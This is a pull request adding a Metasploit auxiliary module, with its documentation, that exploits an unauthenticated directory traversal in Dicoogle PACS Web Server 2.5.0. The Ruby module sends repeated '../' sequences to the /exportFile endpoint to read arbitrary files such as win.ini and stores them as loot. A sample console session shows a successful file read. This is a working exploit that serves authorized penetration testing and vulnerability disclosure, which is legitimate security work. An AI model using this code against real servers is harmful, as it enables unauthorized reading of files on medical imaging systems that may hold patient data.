### PR TITLE
dicoogle directory traversal

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/dicoogle_traversal.md
+++ b/documentation/modules/auxiliary/scanner/http/dicoogle_traversal.md
@@ -1,0 +1,38 @@
+## Description
+
+This module exploits an unauthenticated directory traversal vulnerability
+in the Dicoogle PACS Web Server v2.5.0 and possibly earlier, allowing an
+attacker to read arbitrary files with the web server privileges.
+While the application is java based, the directory traversal was only
+successful against Windows targets.
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. `use auxiliary/scanner/http/dicoogle_traversal`
+  3. `set RHOSTS [IP]`
+  4. `run`
+
+## Scenarios
+
+### Tested on Windows 2012
+
+  ```
+  msf5 > use auxiliary/scanner/http/dicoogle_traversal 
+  msf5 auxiliary(scanner/http/dicoogle_traversal) > set rhosts 1.1.1.1
+  rhosts => 1.1.1.1
+  msf5 auxiliary(scanner/http/dicoogle_traversal) > run
+  
+  [+] ; for 16-bit app support
+  [fonts]
+  [extensions]
+  [mci extensions]
+  [files]
+  [Mail]
+  MAPI=1
+  
+  [+] File saved in: /root/.msf4/loot/20180721210736_default_1.1.1.1_dicoogle.travers_903795.txt
+  [*] Scanned 1 of 1 hosts (100% complete)
+  [*] Auxiliary module execution completed
+  ```

--- a/documentation/modules/auxiliary/scanner/http/dicoogle_traversal.md
+++ b/documentation/modules/auxiliary/scanner/http/dicoogle_traversal.md
@@ -16,7 +16,7 @@ successful against Windows targets.
 
 ## Scenarios
 
-### Tested on Windows 2012
+### Tested on Windows 2012 with Dicoogle 2.5.0 on Java 8 update 151
 
   ```
   msf5 > use auxiliary/scanner/http/dicoogle_traversal 

--- a/documentation/modules/auxiliary/scanner/http/dicoogle_traversal.md
+++ b/documentation/modules/auxiliary/scanner/http/dicoogle_traversal.md
@@ -4,7 +4,7 @@ This module exploits an unauthenticated directory traversal vulnerability
 in the Dicoogle PACS Web Server v2.5.0 and possibly earlier, allowing an
 attacker to read arbitrary files with the web server privileges.
 While the application is java based, the directory traversal was only
-successful against Windows targets.
+successfully tested against Windows targets.
 
 
 ## Verification Steps

--- a/documentation/modules/auxiliary/scanner/http/dicoogle_traversal.md
+++ b/documentation/modules/auxiliary/scanner/http/dicoogle_traversal.md
@@ -22,9 +22,11 @@ successfully tested against Windows targets.
   msf5 > use auxiliary/scanner/http/dicoogle_traversal 
   msf5 auxiliary(scanner/http/dicoogle_traversal) > set rhosts 1.1.1.1
   rhosts => 1.1.1.1
+  msf5 auxiliary(scanner/http/dicoogle_traversal) > set verbose true
+  verbose => true
   msf5 auxiliary(scanner/http/dicoogle_traversal) > run
   
-  [+] ; for 16-bit app support
+  [+] 192.168.2.164:8080 - ; for 16-bit app support
   [fonts]
   [extensions]
   [mci extensions]
@@ -32,7 +34,5 @@ successfully tested against Windows targets.
   [Mail]
   MAPI=1
   
-  [+] File saved in: /root/.msf4/loot/20180721210736_default_1.1.1.1_dicoogle.travers_903795.txt
-  [*] Scanned 1 of 1 hosts (100% complete)
-  [*] Auxiliary module execution completed
+  [+] File saved in: /root/.msf4/loot/20180803091123_default_192.168.2.164_dicoogle.travers_347491.txt
   ```

--- a/modules/auxiliary/scanner/http/dicoogle_traversal.rb
+++ b/modules/auxiliary/scanner/http/dicoogle_traversal.rb
@@ -1,0 +1,67 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Dicoogle PACS Web Server Directory Traversal',
+      'Description' => %q{
+        This module exploits an unauthenticated directory traversal vulnerability
+        in the Dicoogle PACS Web Server v2.5.0 and possibly earlier, allowing an
+        attacker to read arbitrary files with the web server privileges.
+        While the application is java based, the directory traversal was only
+        successful against Windows targets.
+      },
+      'References'  =>
+        [
+          ['EDB', '45007']
+        ],
+      'Author'      =>
+        [
+          'Carlos Avila', # Vulnerability discovery
+          'h00die' # Metasploit module
+        ],
+      'License'     => MSF_LICENSE
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(8080),
+        OptString.new('FILEPATH', [true, "The path to the file to read", '\\windows\\win.ini']),
+        OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 15 ])
+      ])
+
+  end
+
+  def run_host(ip)
+    filename = datastore['FILEPATH']
+    traversal = "..%5d" * datastore['DEPTH'] << filename
+
+    res = send_request_raw({
+      'method' => 'GET',
+      'uri'    => "/exportFile?UID=#{traversal}"
+    })
+
+    if res && res.code == 200
+      print_good("#{res.body}")
+
+      path = store_loot(
+        'dicoogle.traversal',
+        'text/plain',
+        ip,
+        res,
+        filename
+      )
+
+      print_good("File saved in: #{path}")
+    else
+      print_error("Nothing was downloaded")
+    end
+  end
+end

--- a/modules/auxiliary/scanner/http/dicoogle_traversal.rb
+++ b/modules/auxiliary/scanner/http/dicoogle_traversal.rb
@@ -27,6 +27,7 @@ class MetasploitModule < Msf::Auxiliary
           'Carlos Avila', # Vulnerability discovery
           'h00die' # Metasploit module
         ],
+      'DisclosureDate' => 'Jul 11 2018',
       'License'     => MSF_LICENSE
     ))
 
@@ -43,25 +44,27 @@ class MetasploitModule < Msf::Auxiliary
     filename = datastore['FILEPATH']
     traversal = "..%5d" * datastore['DEPTH'] << filename
 
-    res = send_request_raw({
+    res = send_request_cgi({
       'method' => 'GET',
-      'uri'    => "/exportFile?UID=#{traversal}"
+      'uri'    => '/exportFile',
+      'vars_get' => {
+        'UID' => traversal
+      }
     })
 
-    if res && res.code == 200
-      print_good("#{res.body}")
+    unless res && res.code == 200
+      print_error('Nothing was downloaded')
+      return
+    end
 
-      path = store_loot(
-        'dicoogle.traversal',
-        'text/plain',
-        ip,
-        res,
-        filename
-      )
-
-      print_good("File saved in: #{path}")
-    else
-      print_error("Nothing was downloaded")
+    vprint_good("#{res.body}")
+    path = store_loot(
+      'dicoogle.traversal',
+      'text/plain',
+      ip,
+      res.body,
+      filename
+    )
     end
   end
 end

--- a/modules/auxiliary/scanner/http/dicoogle_traversal.rb
+++ b/modules/auxiliary/scanner/http/dicoogle_traversal.rb
@@ -34,7 +34,7 @@ class MetasploitModule < Msf::Auxiliary
     register_options(
       [
         Opt::RPORT(8080),
-        OptString.new('FILEPATH', [true, "The path to the file to read", '\\windows\\win.ini']),
+        OptString.new('FILEPATH', [true, "The path to the file to read", '/windows/win.ini']),
         OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 15 ])
       ])
 
@@ -42,7 +42,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def run_host(ip)
     filename = datastore['FILEPATH']
-    traversal = "..%5d" * datastore['DEPTH'] << filename
+    traversal = "../" * datastore['DEPTH'] << filename
 
     res = send_request_cgi({
       'method' => 'GET',
@@ -57,7 +57,7 @@ class MetasploitModule < Msf::Auxiliary
       return
     end
 
-    vprint_good("#{res.body}")
+    vprint_good("#{peer} - #{res.body}")
     path = store_loot(
       'dicoogle.traversal',
       'text/plain',
@@ -65,5 +65,6 @@ class MetasploitModule < Msf::Auxiliary
       res.body,
       filename
     )
+    print_good("File saved in: #{path}")
   end
 end

--- a/modules/auxiliary/scanner/http/dicoogle_traversal.rb
+++ b/modules/auxiliary/scanner/http/dicoogle_traversal.rb
@@ -65,6 +65,5 @@ class MetasploitModule < Msf::Auxiliary
       res.body,
       filename
     )
-    end
   end
 end


### PR DESCRIPTION
This is a quick and easy dir travers against Dicoogle v2.5.0.
The server software is a request for download (instant approval), so I'd advise someone to go grab it ASAP to prevent them from pushing a new version, or I can get it to you somehow (27mb zip).

Java based webapp, however I was only able to get this to work against Windows, as shown in the verified EDB post.

## Verification

- [ ] Start `msfconsole`
- [ ] `use auxiliary/scanner/http/dicoogle_traversal`
- [ ] `set rhosts`
- [ ] `run`
- [ ] **Verify** you can view sweet windows files
- [ ] **Verify** no mispellings

